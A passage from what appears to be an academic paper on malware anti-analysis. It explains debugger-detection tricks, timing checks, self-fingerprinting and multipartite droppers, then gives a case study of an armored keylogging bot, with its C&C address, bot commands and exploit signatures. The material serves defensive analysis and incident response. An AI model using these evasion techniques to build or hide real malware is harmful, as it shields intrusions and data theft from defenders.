The UnhandledExceptionFilter() API determines whether the process is being debugged. If it is, then UnhandledExceptionFilter passes the exception first to the debugger, and then is Figure 27 - Chaining of Handlers (Jackson, 2008) (Bania) supposed to call the process's unhandled exception filter. If the process isn't being debugged, then UnhandledExceptionFilter calls the process's unhandled exception filter. Depending on the filter function's return, UnhandledExceptionFilter either continues execution at the point of the exception, or displays a system-modal dialog box informing the user that the application is to be terminated due to an unhandled exception (Microsoft, 2006). Due to this implementation of the UnhandledExceptionFilter, a debugger can be detected with the code snippet shown in Figure 28.

Figure 28 - Use of Exception Handling to identify debugger (Veracode, 2008)

As with previous Debugger Detection techniques, the IsDebuggerPresent routine can be bypassed if the technique is recognized. Even though these techniques can be bypassed, combing through the assembly language code for each of these techniques can be quite onerous and may cause abandonment of the binary analysis (Jackson, 2008).

4.6.5. Timing Based Detection There is no doubt that when a program is being debugged, the time delta between instructions is longer than if the CPU is freely running the executable. Based on this simple tenet, the developer of the malware can insert sequences of instructions that calculate the time delta between the beginning and ending of the sequence. Assuming there are no conditional jumps, or overwhelming load on the system, the time delta can be measured in milliseconds or less. By comparison, even the most skilled reverse engineer will take a few seconds to step through a series of instructions, especially if the function of the instructions is not immediately obvious. This check could be coded using the snippet shown in Figure 29.

This routine, unlike some of the other debugger detection routines is relatively straight forward is obvious to spot. Thus, an examiner will have no difficulty in bypassing the detection routine.

Figure 29 - – Use of Timing sequence to identify debugger (Veracode, 2008) (Bania) 4.6.6. Modified Code Based Detection This debugger detection mechanism is more difficult to code. The theory behind the technique is that the developer of the executable should be able to define a fingerprint of itself while in memory and then carry this fingerprint within the executable (Veracode, 2008). Then, upon each execution of the binary, the in-memory process fingerprint is compared to the fingerprint stored within the executable.

Given that each of the other debugger detection techniques requires the modification of either the process in memory or executable image on disk, if any other protection mechanisms are bypassed the in-memory fingerprint should be different than the fingerprint stored within the executable. Any differences between the two fingerprints could result in the immediate termination of the executable.

If the routines that define the in-memory fingerprint can be identified, than the same technique of runtime patching the executable should be able to bypass this protection mechanism.

4.7. Multi-partite Multi-partite traditionally refers to a malware threat (virus, Trojan horse) that has components of both a boot sector virus and a user or kernel mode rootkit (US Army, 2010). This traditional view has been updated to include the Downloader/Dropper family of threats (Microsoft, 2010). These Downloader/ Droppers usually save a range of files to the victim’s drive (usually to the Windows directory, the Windows system directory, temporary directory etc.), and launches them without any notification (or with fake notification of an archive error, an outdated operating system version, etc.) (Kaspersky Lab ZAO, 2009)

The goal of the multi-partite armoring technique is to minimize the footprint of each section of the malware such that it is harder to detect, and easier to upgrade/expand to new threat capabilities. To begin, multi-partite functionality must have implemented network transfer mechanisms and process 54

control mechanism that allow for new functionality to be downloaded and for processes to be restarted, system settings updated, and dynamically linked libraries to be unloaded and reloaded. Dynamically linked libraries (DLLs) are modules that contain functions and data that can be used by another module (application or DLL). When the functions in a DLL change, the applications that use them do not need to be re-compiled or re-linked as long as the function arguments, calling conventions, and return values do not change. In contrast, statically linked object code requires that the application be re-linked when the functions change. (Microsoft, 2010)

Hackers and other malicious actors use this armoring technique to allow for updates in anti-forensic routines, IDS evasion tactics, and maintaining a level of control over their intellectual property. This level of control allows the malware author to update and improve his malware without losing control over the infected machine. As well, by spreading the functionality into multiple files on a victim computer, it is more likely that a cleaning event will leave some portion of the malware untouched, allowing for recontamination of the computer system.

An instance of malware that utilizes multipartite armoring techniques can defeat the traditional analysis cycle by keeping both functions of the malware and files related to the malware hidden from the forensic examiner. A method that the multipartite malware author can use is on-demand downloading or installation of functions that make up the malware. Similarly, the technique of splitting capabilities across multiple files make it more difficult for the forensic examiner to clean the system – increasing the possibility that a portion of the malicious code will be left on the system after the incident is considered closed.

Forensic examiners can update their procedures and tools to account for these multipartite armoring techniques by:

1) File analysis of all files on the system using a hashing or signature based system (not just those identified as the files that spawned the identified malware process) 2) Registry analysis – examination of all entries in all of the “auto-starts” locations, up to and including all scheduled batch jobs. 3) Exhaustive analysis of running system – to identify all backgrounded processes that may be part of the running threat.

These listed procedures offer no special visibility into systems infected with malware. It is exactly for this reason that binary armoring techniques are so coveted by malware authors and researched by information security researchers and analysts.

4.8. Conclusions Modern malware authors are familiar and fluent in the binary analysis capabilities used by the information Security defenders. In this way, the authors systematically focus on every step of the analysis process and devise methods designed to inhibit the successful completion of that analysis step. For the malware authors, the benefit of hiding these malicious executables translates into additional information stolen, additional system access, and additional revenue (e.g.: number of spam messages sent from bot-controlled systems). It is due to these benefits that the malware authors can continue to spend so much time and energy devising these additional armoring techniques. This constant escalation of attacker effectiveness also keeps the Information Security defenders engaged in the development of sophisticated analysis tools that can return good results while not being rendered ineffective by the malware itself.

5. Case Study

5.1. Introduction Having gone through the steps that make up the typical binary analysis of a piece of malware, and having gone through many of the techniques in use to armor an executable against reverse engineering or analysis, a case study that aims to compare a simple, feature rich root kit that has both been armored and not armored at all will be presented. The expected outcome of this case study is to demonstrate how effective the armoring techniques are against the analysis process.

The preparation and identification sections will be common for both the basic rootkit and the armored rootkit. The containment section will be separated into 2 sub-sections, one each for the basic rootkit and the armored rootkit. The eradication and recovery sections will compare the outcomes based on the data collected in each of the containment scenarios. Conclusions and lessons learned will be derived from these findings.

5.2. Preparation For this case study there is no additional preparation beyond the collection and organization of the prerequisite tools described in Section 3.1 and proceduralized in Section 3.4. As much as possible, the steps will be undertaken in exactly the same format and fashion as the described in those sections.

5.3. Identification Identification of malicious executables continues to be a challenging opportunity for Information Security (InfoSec) professionals. Authors of malware are aware of the tools and techniques the InfoSec professionals use to identify these threats. Accordingly, the malware authors implement features designed to evade as many of these controls as possible. Some of these features include:

1) Using protocols typically found in all corporate environments (HTTP, HTTPS) 2) Maintaining RFC compliance 3) Communicate with multiple C&C servers

By using protocols found in every corporate environment, monitoring system alerts aren’t raised when malicious traffic is transacted across the network. This malicious traffic blends in, largely undetected, with the vast amount of legitimate Internet traffic. As more business systems adopt web based user interfaces, this challenge will continue to grow.

By maintaining RFC compliance, this malicious traffic becomes even more difficult to detect. Most network IDS systems have multiple rules built around detecting web traffic that does not adhere to the RFC standard. The alerts that are raised as a result of non-RFC compliant traffic are often inadvertently identifying a C&C server involved in a malware infection.

Finally, by seamlessly communicating with multiple C&C servers, the malicious endpoint can confound the detection ability of many varieties of traffic anomaly monitoring gear. Not only does communicating with multiple C&C servers increase the difficulty of detection for the defender, but it increases the reliability of the entire malware ecosystem.

For this case study, it is assumed that one of the pre-existing monitoring systems have identified this host as being infected with some type of malicious binary.

5.4. Containment The first scenario is built upon the identification of a piece of malware that is going to show itself to be

poorly armored, and as such, quite incapable of remaining active for extended periods of time.

Upon arrival at the infected host, an immediate examination of the running tasks and the location of the file are completed. In this case (shown in Figure 30), the file named is identified Figure 30 - Identification of offending file as the malware. After the suspected file has been identified, and in keeping with the analysis process shown in Figure 7, the binary is extracted from the infected system in order to be examined on a virtualized system outfitted with a number of monitoring systems. The first examination of the file is in the form of running a system delta tool against it. The results of the delta test are included as Appendix B. Data identified as a result of the system delta tool execution includes the Registry key that is modified, and the location on disk where the malware Figure 31 - Using a system delta tool is installed. As well, the results show that none of the Windows system files have been modified.

The next tool to be run is SysAnalyzer (shown in Figure 32). SysAnalyzer returns an important finding: namely exploits that match the signatures within the tool. This additional fact offers insight into the 58

malware’s ability to spread throughout a network. The full output of SysAnalyzer can be found in Appendix B, but the identified information regarding the exploits is shown in Figure 33.

Figure 32 - Using SysAnalyzer to analyze the malware

Exploit Signatures: ------Scanning for 19 signatures *** Found: RPC DCOM Exploit MS03-026 *** Found: Microsoft Workstation Vulnurability *** Found: LSASS exploit - MS04-011 Scan Complete: 240Kb in 0.016 seconds

Figure 33 – Exploit findings from Sysanalyzer

From here, the malware is opened from within PEid. The results of PEid show that the file has not been packed, and was likely (not for certain) compiled with Microsoft Visual C v6.0 (based on the linker information embedded in the binary). As well, as shown in Figure 34, there are a number of ASCII strings that offer information about the goals of the malware. The list of strings found in this specimen of malware has given the analyst a wealth of leads to follow in the investigation, including:

1) IP addresses of likely C&C servers (172.16.5.180) 2) Sections of seemingly valid URIs (get /cgi-bin/a?a=) 3) Registry locations (SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon) 4) System file names (C:\Windows\system32\userinit.exe)

5) Potential C&C commands (join, idle, SLEEPING, VERSION) 6) An identifier of the threat (armorbot)

Figure 34 - View of strings within the malware

Another aspect of the behavioural analysis of the malware involves the networking capabilities of the malware. The data uncovered thus far has given a good picture of the capabilities of this malware: updates the Registry; it has a number of commands, passed via a C&C server, seemingly located at 172.16.5.180, it communicates using TCP port 80; and has the ability to spread via automated exploits to other systems on the network. While the other tools were running, a capture of the network communication was being done of the traffic between the infected system and its peer located at 172.16.5.180. As shown in the extraction of the human readable portion of the network traffic (Figure 35), the malware appears to have key logger capabilities, and auto-update capabilities. With this information, combined with firewall perimeter logs, an estimation of the duration of the infection and the extent of the loss of intellectual property can be investigated.

Figure 35 – Human readable output from network packet capture

As a final stage in the analysis of this malware specimen, the file is disassembled down to machine language. At this time, given the wealth of data collected using other means, the presentation of the malware via IDA-pro (shown in Figure 36) is merely for verification of the findings.

From this point, using perimeter egress logs, it should be possible to accurately identify all of the infected systems. Each of the infected systems can be contained, the key log files can be assessed for potential damage via ex-filtration, and then the threat can be eradicated from the system. As well, perimeter controls can be added to block all access to the known C&C control servers. At this point the analysis can be considered complete.

Figure 36 – View of disassembled code and execution tree

At this time, the case study will attempt to extract the same level of data from the other malicious file, except that in this instance the file has been armored. Where appropriate, I/O routines have been replaced with armored versions of the routine. Additionally, the malware has been packed and crypted using commonly available tools.

Selecting the atypical processes from the task list did the identification of the malware process running on the infected machine. The file that spawned the malicious process was then identified and the file was taken to the same virtualized analysis environment as used for the previous malware analysis.

The armored malware was run through the same installation process as before, but neither Inctrl5 nor SysAnalyzer was able to provide meaningful context or explanation to what the capabilities of the new malware are. The complete output of both of these tools is available in Appendix B.

With the failure of these initial behavioural analysis steps to provide any meaningful data, the analysis moved into the binary and coding analysis phase. An attempt was made to open the file in a debugger, but the debugger complained of file errors (Figure 37).

Figure 37 – Error message resulting from load into debugger

The file appeared to load successfully once the error messages were acknowledged, but the process terminated immediately (Figure 38).

The After additional unsuccessful attempts to spawn the malware in the virtualized environment, from within analysis tools like Inctrl5 or SysAnalyzer and from the Figure 38 - Process terminated once in debugger debugger, it was concluded that there were protections in place to stop the malware from running in both a virtualized environment and via a debugger.

Once the platform and monitoring software was installed on a clean machine, the malware was executed on the system. The output of SysAnalyzer is attached in Appendix B, but none of the expected information was produced. Similarly, there were no recognizable strings in the file dump. Recognizing that most packers and crypters will make all ASCII strings appear garbled in the file view, the in-memory Figure 39 – View of strings within the in-memory process process was queried for useable strings. As shown in Figure 39, there weren’t even decoded strings in the in-memory process.

At this point, an assessment of the network traffic was initiated. As shown in Figure 40, the network traffic reveals little more than a single address, 172.16.5.180, using what appears to be encoded HTML for communication with the C&C server. Based on these findings, monitoring routines can be defined to notify on computers connecting to this IP address over port TCP80, but given the lack of other

supporting evidence, it can’t be determined whether this is the only network destination and/or protocol/port combination in use by the malware.

Figure 40 – Overlaid view of malware traffic (ASCII printable and TCP stream reassembled)

A media analysis uncovered what appears to be a key logger file. In much the same way as the intercepted network communication, it appears as if there is key logging going on, it is just not possible to verify the finding. Further, it is not possible to determine how much, or what type of information has been logged. In fact, the only clue that the file is indeed a key log file is the file name. This file could

Figure 41 – View of keylogger.dat contents 64

actually be holding any compromised information. Further, as investigators, we have no idea how long this collection has been going on, or how many times this file has been uploaded to the C&C server. The content of the “keylogger.dat” file is shown in Figure 41.

Based on the results indicated by PEid, this armored malware is crypted or packed using some unknown or unrecognized algorithm. By loading the malware into a debugger and stepping through the initial unpacking/decrypting routines, the analyst should be able to identify the Original Entry Point (OEP) of the malware. This OEP is important as it sets up all the relative addresses in the remainder of the PE file. However, due to the armoring techniques implemented within the crypter, the OEP returned by the debugger plug-ins are not valid (Figure 42). With an invalid OEP, the Import Address Table cannot be successfully restored (Figure 43).

Figure 42 - Finding OEP using Ollydump

Figure 43 - Reconstructing an IAT without OEP

As a last step of automated analysis before being forced into a line-by-line disassembly and re- constitution of the malware, a memory dump was collected from the system infected with the malware using Nigilant32. Volatility v1.3beta was used in an attempt to pull process information from the memory dump. The full script capture from the Volatility run is captured in Appendix B. Unfortunately, the malware process was not susceptible to analysis using the Volatility framework.

At this time, the only known data collected from this malware specimen is the IP address 172.16.5.180 and the URI prefix of “/cgi-bin/a?a=”. This information can be used to create custom monitoring routines for the identification of infected machines. Any further information required about the malware will only be identified after line by line disassembly of the malware executable. This line by line disassembly is beyond the skill of most analysts and will typically result in the abandonment of further analysis.

5.5. Eradication In the case of the not armored malware, the eradication plan could simply be to identify all machines within the corporate network that try to connect to the C&C server address. Once identified, a manual cleaning procedure could be undertaken, followed by a patching of every vulnerable system. Specific monitoring routines could be created, based on the strings and IP addresses identified through the analysis. In this way, any evidence of a re-infection will be immediately identified and a quick response can be undertaken.

In the case of the armored malware, it isn’t clear that every capability within the malware has been identified. It may be the case that functionality lies dormant for some amount of time waiting on some future event or date to become active. It would be prudent to build monitoring routines that alert on network traffic to sources that were identified through the analysis. Once those machines are identified, it may be appropriate to re-install the system from original install media. This may be the only way to completely assure the organization that the machine is free from the infection.

5.6. Recovery In the case of the not armored malware, recovery is quite straight forward as the capabilities of the malware are known, and the information exfiltrated via the key logger can be assessed. In this case, a simple cleaning routine is all that is needed to recover the system back to its pre-infection state.

Recovery for the armored malware will be more involved than that required by the not armored malware. As suggested in the recovery section, a complete re-install from original media is the best option for eradicating the malware. However, in the recovery stage, all data will need to be recovered from backups. A close look will need to be performed on each recovered file, as it is not known whether the malware had the capability to attach itself to data files for future re-infection. Only files that can be assessed and considered clean with good confidence should be returned to the production environment.

5.7. Lessons Learned Some lessons learned in both the armored and not armored malware case are:

1) Ingress points exist in the network that allowed malicious content into the trusted environment 2) Detection routines have gaps, as alerts were not raised when the threat was first realized 3) Malicious threats leverage protocols, in RFC compliant methods, so detection routines based solely on improperly formatted protocols is ineffective 4) Ridding a system of a malware threat relies on manual intervention; in a large network manual intervention is impractical.

Each of these lessons should be properly assessed; the risk to the organization qualified and mitigation strategies should be fleshed out. Once this material is created, the plans should be prioritized by the organization and an implementation plan should be created. Metrics can be used to track the effectiveness of the implemented measures against future occurrences of infection.

5.8. Conclusions As demonstrate through this case study, tools and procedures make quick work of analyzing a malware specimen that has not been armored. The analysis extracted the network destinations, the commands, and the methods for spread, data collection, and data transmission. The findings returned from the analysis allow for specific monitoring routines to be created and procedures developed to clean infected systems. In the other case, the best information collected from the analysis of the armored binary is a single IP address believed to be the C&C server. Even though the analysis lasted far longer, and used tools requiring more specialist knowledge, the analysis was unable to uncover the capabilities of the malware.

6. Conclusions The primary reason an organization will undertake a binary analysis of malware is to understand the breadth of the attack and the impact of the attack. In the case of a malware infection, the breadth of the attack or infection may simply be number of machines infected. This count of infected machines could be identified through a number of systems – vendor supplied signatures in IDS, Firewall endpoint logs, and/or A/V cleaning logs from signatures developed by A/V partner.

The impact of the attack will be decided based on the amount of damage done by the infected machine (under the control of the attacker) or by the amount and type of data stolen through the infection. In order to understand either the damage potential of the malware or the amount of damage done by the malware requires analysis to be completed. This analysis will be a combination of network and host based activities that can begin once a threat is known and identified.

Malware authors recognize that a key defense against being identified is the ability to remain hidden in both the network and the hosts connected to it. In this way, one of the goals of binary armoring is to ensure that the defenders of the network are unable to differentiate between normal traffic and traffic that exists as a result of an ongoing infection by malware. Additionally, the other primary goal of the armoring techniques described in this report is to block the understanding and mechanics of the capabilities of the armored executable.

The armoring techniques described in this report are quite effective. The combination of network encryption over RFC compliant protocols, debugger and VME detection, executable packing or crypting, and poly- or metamorphic transformation will often leave the malware investigator will little idea of the true nature of the threat. As well, a significant amount of the analysis work is currently undertaken using dynamic analysis tools connected to systems in a virtualized environment. Unfortunately, there are two main issues that limit the completeness of the results delivered by a dynamic analysis tool are (a) limited test cover- age and (b) malware programs that detect and evade the analysis environment (Balzarotti, Cova, Karlberger, Kruegel, Kirda, & Vigna, 2010).

These techniques were demonstrated in the case study, and the resulting amount and quality of information collected by the analysis of an armored binary was quite poor. These poor results also took a considerable amount of time, effort, and tools to collect. As a result, given the significant investment and insignificant return, it can be concluded that the effort expended in binary analysis should have

better been spent in other areas of response, namely the fortification of existing controls, or the timely and broad publication of threat specific eradication routines.

Concentrating on response areas other than binary analysis is consistent with the proposed “Gateway malware theory” ([email protected], 2009) which states that “simple malware infections, if not dealt with quickly, will inevitably lead to the download and installation of poorly detected malware that poses a real and true risk to organizations. The focus of any investigation of malware should be less focused on the malware and more focused on the data that is contained on, or accessible from the infected system. Therefore the first step in the investigation of malware should be data centric. If the contents of a system are unknown, then the risk, regardless of the presence of malware, cannot be known or determined. As such, the presence of malware is irrelevant unless the contents of the system are known, and one must know what level of access the infected system, or user of the system has to sensitive data.” ([email protected], 2009)

As organizations continue to rely more and more on the computing infrastructure and the interconnectedness of their business, and while the proceeds of a successful intrusion continue to soar, malware will continue to flourish. This malware is created at an alarming rate, it is armored using sophisticated techniques, it attacks organizations from every conceivable vector, and is difficult to properly analyze. Until such a time that a technology is created that will accurately identify and block malware, commercial organizations should allocate their resources to building better detection mechanisms and faster response and eradication plans.

7. Bibliography Agile Risk Management LLC. (2011). Nigilant32. Retrieved 01 30, 2010, from http://www.agileriskmanagement.com: http://www.agileriskmanagement.com/publications_4.html

Al Daoud, E., Jebril, I. H., & Zaqaibeh, B. (2008, 09). Computer Virus Strategies and Detection. Retrieved 01 11, 2011, from http://www.emis.de: http://www.emis.de/journals/IJOPCM/files/IJOPCM(vol.1.2.3.S.08).pdf

Aquilina, J., Casey, E., & Malin, C. (2008). Malware Forensics: Investigating and Analyzing Malicious Code. Burlington, MA: Syngress Publishing Inc.

Balzarotti, D., Cova, M., Karlberger, C., Kruegel, C., Kirda, E., & Vigna, G. (2010). Efﬁcient Detection of Split Personalities in Malware. Vienna: Austrian Science Department.

Bania, P. (n.d.). Playing with RDTSC. Retrieved 01 03, 2011, from http://www.piotrbania.com: http://www.piotrbania.com/all/articles/playing_with_rdtsc.txt

Blunden, R. B. (2009). The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System. Plano, Texas, USA: Wordware Publishing.

Bradley, K., & Harms, K. (2008, October 13). Mandiant.TacticalPanel.pdf. Retrieved October 1, 2010, from http://files.sans.org: http://files.sans.org/summit/forensics08/PDFs/Mandiant.TacticalPanel.pdf

Cace Technologies. (2006, 12 01). WinDump: tcpdump for Windows. Retrieved 01 30, 2011, from http://www.mirrorservice.org: http://www.mirrorservice.org/sites/ftp.wiretapped.net/pub/security/packet- capture/winpcap/windump/

Carvey, H. (2007). Windows Forensic Analysis. Burlington, MA, USA: Syngress.

Chen, X., Andersen, J., Mao, Z. M., Bailey, M., & Nazario, J. (2008, 09 22). Towards an Understanding of Anti-virtualization and Anti-debugging Behavior in Modern Malware. Retrieved 01 11, 2011, from http://www.eecs.umich.edu: http://www.eecs.umich.edu/~zmao/Papers/DCCS-xu-chen.pdf

Christodorescu, M., & Jha, S. (2003, 02). Static Analysis of Executables to Detect Malicious Patterns. Retrieved 01 12, 2011, from http://www.cs.wisc.edu: http://www.cs.wisc.edu/wisa/papers/security03/cj03.pdf

Christodorescu, M., Jha, S., Seshia, S. A., Song, D., & Bryant, R. E. (2005, 05 11). Semantics-aware Malware Detection. Retrieved 01 11, 2011, from http://www.cs.berkeley.edu: http://www.cs.berkeley.edu/~dawnsong/papers/semantic-aware.pdf

Davis, M. A., Bodmer, S. M., & LeMasters, A. (2010). Hacking Exposed: Malware and Rootkits. New York, NY, USA: McGraw Hill.

Diamond Computer Systems Pty. (2005, 09 05). DiamondCS OpenPorts 1.0. Retrieved 01 15, 2011, from http://www.softpedia.com: http://www.softpedia.com/get/Network-Tools/Network- Information/DiamondCS-OpenPorts.shtml

Dinaburg, A., Royal, P. S., & Lee, W. (2009, April 1). Ether: Malware Analysis via Hardware Virtualization Extensions. Retrieved 01 10, 2011, from http://www.maht0x0r.net: http://www.maht0x0r.net/library/computing/Malware_Analysis_via_Hardware_Virtualization_Extensio ns_-_ether_ccs_2008.pdf

Driller, T. M. (2002, Feb). Metamorphism in practice or "How I made MetaPHOR and what I've learnt". Retrieved 12 17, 2010, from http://vx.netlux.org/lib/vmd01.html.

Eilam, E. (2005). Reversing: Secrets of Reverse Engineering. Indianapolis, IN: Wiley Publishing, Inc.

Erbschloe, M. (2005). Trojans, Worms, and Spyware. Amsterdam, Holland: Elsevier.

Falliere, N. (2007, 9 11). Windows Anti-Debug Reference. Retrieved 01 03, 2011, from Symantec Corporation: http://www.symantec.com/connect/articles/windows-anti-debug-reference

Ferrie, P. (2007, 01 24). Attacks on Virtual Machine Emulators. Retrieved 01 10, 2011, from http://www.symantec.com: http://www.symantec.com/avcenter/reference/Virtual_Machine_Threats.pdf

Gigapede. (2011, 01 30). OllyDbg Plugins: OllyDump. Retrieved 01 30, 2011, from http://www.openrce.org: http://www.openrce.org/downloads/details/108/OllyDump

HeavenTools Software. (2011). PE.Explorer. Retrieved 01 30, 2011, from http://www.heaventools.com: http://www.heaventools.com/overview.htm

Hex-Rays SA . (2011). The IDA Pro Disassembler and Debugger. Retrieved 01 30, 2011, from http://www.hex-rays.com: http://www.hex-rays.com/idapro/

[email protected]. (2010, 03 25). GUnPacker. Retrieved 01 30, 2011, from http://www.woodmann.com: http://www.woodmann.com/collaborative/tools/index.php/GUnPacker [email protected]. (2009, March 22). Gateway Malware Theory. Retrieved Sept 02, 2010, from Forensic Incident Response: http://forensicir.blogspot.com/2009/03/gateway-malware-theory.html

Hoglund, G., & Butler, J. (2006). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ, USA: Addison Wesley.

Hoglund, G., & McGraw, G. (2004). Exploiting Software: How to Break Code. Boston, MA, USA: Addison- Wesley.

Hosmer, C. (2008). Polymorphic & Metamorphic Malware. Las Vegas, NV: Black Hat Briefings and Training.

iDefense Labs. (2011). MALCODE ANALYSIS SOFTWARE TOOLS . Retrieved 01 30, 2011, from http://labs.idefense.com: http://labs.idefense.com/software/malcode.php

Intel. (1999). Intel Architecture Software Developer’s Manual. Volume 3: System Programming. Retrieved 01 15, 2011, from http://download.intel.com: http://download.intel.com/design/PentiumII/manuals/24319202.pdf

Jackson, J. (2008, 11 9). An Anti-Reverse Engineering Guide. Retrieved 01 03, 2011, from http://www.codeproject.com: http://www.codeproject.com/KB/security/AntiReverseEngineering.aspx

Jibz, Qwerton, snaker, & xineohP. (2007). peid. Retrieved 12 15, 2010, from http://www.peid.info/: http://www.peid.info/

Kaminsky, D. (2008). Reverse Engineering Code with IDA Pro. Burlington, MA, USA: Syngress.

Kang, M. G., Yin, H., Hanna, S., McCamant, S., & Song, D. (2009, 05 05). Emulating Emulation-Resistant Malware. Retrieved 01 10, 2011, from http://bitblaze.cs.berkeley.edu: http://bitblaze.cs.berkeley.edu/papers/VMSec02-kang.pdf

Kaspersky Lab ZAO. (2009, 03 18). Trojan-Dropper.Win32.Kido.a. Retrieved 01 15, 2011, from http://www.securelist.com: http://www.securelist.com/en/descriptions/old21782844

Kaspersky, K. (2003). Hacker Disassembly Uncovered. Wayne, PA, USA: A-List, LLC.

Kendall, K. (2007, August 1). PRACTICAL MALWARE ANALYSIS. Retrieved Sept 30, 2010, from http://www.blackhat.com: http://www.blackhat.com/presentations/bh-dc- 07/Kendall_McMillan/Paper/bh-dc-07-Kendall_McMillan-WP.pdf

Kim, H. C., Inoue, D., Eto, M., Takagi, Y., & Nakao, K. (2009, May 1). Toward Generic Unpacking Techniques for Malware Analysis with Quantification of Code Revelation. Retrieved October 1, 2010, from http://jwis2009.nsysu.edu.tw: http://jwis2009.nsysu.edu.tw/location/paper/Toward%20Generic%20Unpacking%20Techniques%20for %20Malware%20Analysis%20with%20Quantification%20of%20Code%20Revelation.pdf

Klein, T. (2010). Virtual Machine Monitors. Retrieved 01 10, 2011, from http://www.trapkit.de: http://www.trapkit.de/research/vmm/index.html

Kleissner, P. (2008, July 1). polymorphic-encryption-methods. Retrieved October 1, 2010, from http://web17.webbpro.de: http://web17.webbpro.de/index.php?page=polymorphic-encryption- methods

Kleissner, P. (2009, 2 14). Windows Exception Handling. Retrieved 01 03, 2011, from http://web17.webbpro.de: http://web17.webbpro.de/index.php?page=windows-exception-handling

Kruegel, C., Kirda, E., Mutz, D., Robertson, W., & Vigna, G. (2005, 09). Polymorphic Worm Detection Using Structural Information of Executables. Retrieved 01 11, 2010, from http//www.cs.ucsb.edu: http://www.cs.ucsb.edu/~chris/research/doc/raid05_polyworm.pdf

Lin, D. (2009). Hunting for Undetectable Metamorphic Viruses. Jan Jose, CA: San Jose State University.

Liston, T., & Skoudis, E. (2006). On the Cutting Edge:Thwarting Virtual Machine Detection . Retrieved 01 10, 2011, from http://handlers.sans.org: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf

MackT. (2008, 03 10). ImpREC. Retrieved 01 30, 2011, from http://www.woodmann.com: http://www.woodmann.com/collaborative/tools/index.php/ImpREC

Mandia, K., Prosise, C., & Pepe, M. (2003). Incident Response & Computer Forensics, 2nd Edition. Emeryville, California, USA: McGraw-Hill/ Osbourne.

Microsoft . (2010, 12 14). Structured Exception Handling. Retrieved 01 03, 2011, from http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/ms680657(v=vs.85).aspx

Microsoft. (2010, 12 15). Advantages of Dynamic Linking. Retrieved 01 15, 2011, from http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/ms681938(v=VS.85).aspx

Microsoft. (2006, 11 21). BUG: Unhandled exception filter not called inside debugger. Retrieved 01 03, 2011, from http://support.microsoft.com: http://support.microsoft.com/kb/173652/en-us

Microsoft. (2010). DDEspy: DDE Event and Status Viewer. Retrieved 01 30, 2011, from http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/aa242184(v=vs.60).aspx

Microsoft. (2010). Malware Protection Center: Glossary. Retrieved 01 03, 2011, from http://www.microsoft.com: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Glossary.aspx#trojan_downloader_dro pper

Microsoft. (2006, 11 1). RootKitRevealer. Retrieved 12 30, 2010, from http://technet.microsoft.com: http://technet.microsoft.com/en-us/sysinternals/bb897445

Microsoft. (2010, 12 14). Vectored Exception Handling. Retrieved 01 03, 2011, from http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/ms681420(VS.85).aspx

Microsoft. (2011). Windows Virtual PC. Retrieved 01 30, 2011, from http://www.microsoft.com: http://www.microsoft.com/windows/virtual-pc/

Mushtaq, A. (2011, 01 27). The Dead Giveaways of VM-Aware Malware . Retrieved 01 31, 2011, from http://blog.fireeye.com: http://blog.fireeye.com/research/2011/01/the-dead-giveaways-of-vm-aware- malware.html

National Institute of Standards and Technology (NIST). (2008). Computer Security Incident Handling Guide (SP800-61rev1). Gaithersburg, MD: U.S. Department of Commerce.

National Institute of Standards and Technology (NIST). (2005). Guide to Malware Incident Prevention and Handling (SP800-83). Gaithersburg. MD: U.S. Department of Commerce.

Nektra Advanced Computing. (2009). SpyStudio Overview. Retrieved 01 30, 2011, from http://www.nektra.com: http://www.nektra.com/products/spystudio-api-monitor/

Oreans Technologies. (2008, 12 22). codevirtualizer.php. Retrieved 12 17, 2010, from http://www.oreans.com: http://www.oreans.com/codevirtualizer.php

Orr. (2006, 11). The Viral Darwinism of W32.Evol: An In-depth Analysis of a Metamorphic Engine. Retrieved 1 12, 2011, from http://www.antilife.org: http://www.antilife.org/files/Evol.pdf

PC Magazine. (2000, 12 05). InCtrl5: Download It Here. Retrieved 01 11, 2011, from http://www.pcmag.com: http://www.pcmag.com/article2/0,2817,25126,00.asp

Perrin, C. (2008, 12 18). Understanding layered security and defense in depth. Retrieved 02 01, 2011, from http://www.techrepublic.com: http://www.techrepublic.com/blog/security/understanding- layered-security-and-defense-in-depth/703?tag=rbxccnbtr1

Pietrek, M. (1994, 03). Peering Inside the PE: A Tour of the Win32 Portable Executable File Format. Retrieved 01 05, 2010, from http://www.skynet.ie: http://www.skynet.ie/~caolan/pub/winresdump/winresdump/doc/msdn_peeringpe.html

Praxiom Research Group Ltd. (2009, 12 08). ISO 27001 AND ISO 27002 PLAIN ENGLISH INFORMATION SECURITY MANAGEMENT DEFINITIONS. Retrieved 01 15, 2011, from http://www.praxiom.com: http://www.praxiom.com/iso-27001-definitions.htm#Policy

Quist, D., & Valsmith. (2007, August 1). Covert Debugging: Circumventing Software Armoring Techniques. Retrieved October 1, 2010, from http://www.offensivecomputing.net: http://www.offensivecomputing.net/bhusa2007/dquist-valsmith-covert-debugging-presentation.pdf

Ritter, J. (2006, 11 18). ngrep - network grep. Retrieved 01 30, 2011, from http://ngrep.sourceforge.net/: http://ngrep.sourceforge.net/

Russinovich, M. (2009, 03 02). Strings v2.41. Retrieved 01 11, 2011, from http://technet.microsoft.com: http://technet.microsoft.com/en-us/sysinternals/bb897439

Russinovich, M. (2011, 01 25). Sysinternals Suite. Retrieved 01 30, 2011, from http://technet.microsoft.com: http://technet.microsoft.com/en-us/sysinternals/bb842062

Rutkowska, J. (2004, November). Red Pill... or how to detect VMM using (almost) one. Retrieved 10 31, 2010, from http://www.invisiblethings.org: http://www.invisiblethings.org/papers/redpill.html

SANS, t. I. (2006). Incident Handling Step-by-Step and Computer Crime Investigation. Security 504 - Hacker Techniques, Exploits, & Incident Handling (p. 283). The SANS Institute.

Scambray, J., & McClure, S. (2008). Hacking Windows Exposed: Windows Security Secrets and Solutions, 3rd Edition. New York: McGraw Hill.

Schiller, C., Binkley, J., Harley, D., Evron, G., Bradley, T., Willems, C., et al. (2007). Botnets: The Killer Web App. Brlington, MA: Syngress Publishing Inc.

